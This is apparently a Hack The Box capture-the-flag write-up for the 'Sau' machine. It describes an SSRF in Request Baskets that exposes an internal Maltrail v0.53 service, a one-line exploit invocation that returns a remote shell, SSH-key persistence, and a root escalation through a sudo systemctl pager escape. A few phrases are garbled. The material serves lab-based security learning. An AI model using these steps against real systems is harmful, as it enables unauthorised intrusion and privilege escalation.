Hack The Box: Sau
Enumeration
data:image/s3,"s3://crabby-images/84348/84348763b6a0d0edcfad16afc11f38448641eff7" alt=""
Port 80 doesn't give me anything but port 55555 reveals what looks like a Python-based web app.
data:image/s3,"s3://crabby-images/e7ee6/e7ee6108ac752a72ce2dc7e7a0af04de510039af" alt=""
The application appears to be some sort of app to inspect HTTP requests that are sent to the application. There is a function to enter a master token that allows the user to view all baskets.
A quick Google search reveals a vulnerability in this application. On the application that is deployed matches this version number.
data:image/s3,"s3://crabby-images/5e089/5e089f9d067129a87fa64cdc1bf50d2850e838b4" alt=""
Using this exploit, or manually setting the Forward URL parameter to http://127.0.0.1, reveals an internally accessible malicious traffic detection app running Maltrail v0.53. The page does not seem to function correctly, presumably because resources are not loaded through the proxy.
data:image/s3,"s3://crabby-images/a1f11/a1f1187f7d398e13a75b47aecf84d486b7cfa7fa" alt=""
data:image/s3,"s3://crabby-images/75a1c/75a1c0b1c19fc9a24c27fb2e675cfa6408adf392" alt=""
Looking at the network trace when the page loads, all additional resources return a 404 error because they do not hit the Request Basket URI.
Turns out the Maltrail version deployed here is also vulnerable...
data:image/s3,"s3://crabby-images/5e089/5e089f9d067129a87fa64cdc1bf50d2850e838b4" alt=""
User
Running the exploit was pretty easy with maltrail.py 10.10.16.5 8080
which returned a remote shell. http://10.10.11.224:55555/qxbi14i
data:image/s3,"s3://crabby-images/3b6b4/3b6b439d9298c04a27415a83a1441f0b02aa2617" alt=""
And as user puma
I can get the user flag from /home/puma
. Adding my SSH key give me persistent access. cd pri
Root
Puma has some interemailsting sudo
privileges...
data:image/s3,"s3://crabby-images/ef7f8/ef7f8d834efe02c3d91478ab279e2240fcc2bd16" alt=""
So running the systemctl
command drops you into a less
instance to display the information. less
can be used for command execution with the !
operator.
With that, we can execute any command we want in the context of root.
data:image/s3,"s3://crabby-images/fe38c/fe38c4c0e99245848730c9dc1f1d08f97074c162" alt=""